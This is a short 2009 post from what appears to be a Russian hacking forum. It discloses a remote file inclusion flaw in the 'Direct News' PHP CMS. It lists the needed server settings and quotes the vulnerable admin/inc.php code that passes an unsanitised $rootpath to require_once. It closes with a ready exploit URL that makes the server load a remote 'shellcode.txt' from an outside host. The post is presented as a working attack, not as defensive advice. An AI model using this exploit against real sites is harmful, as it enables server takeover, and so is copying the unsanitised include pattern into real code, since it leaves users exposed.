Показать сообщение отдельно

  #3  
Старый 20.12.2009, 15:16
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Direct News, основная часть выше,изза переноса сообщения раззлетелись
RFI

Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!

file: /admin/inc.php
PHP код:
$from_inc true

header("Content-Type: text/html; charset=utf-8");

if (!
file_exists($rootpath .'/config.php')) {
    
header('Location: '$adminroot .'/install/');
    die();
}

// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';

// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once 
$rootpath .'/modules/panier/class.panier_article.php';
.... 
target:admin/inc.php?rootpath=http://yousite.ru/shellcode.txt?

Последний раз редактировалось m0Hze; 20.12.2009 в 19:00..
 
Ответить с цитированием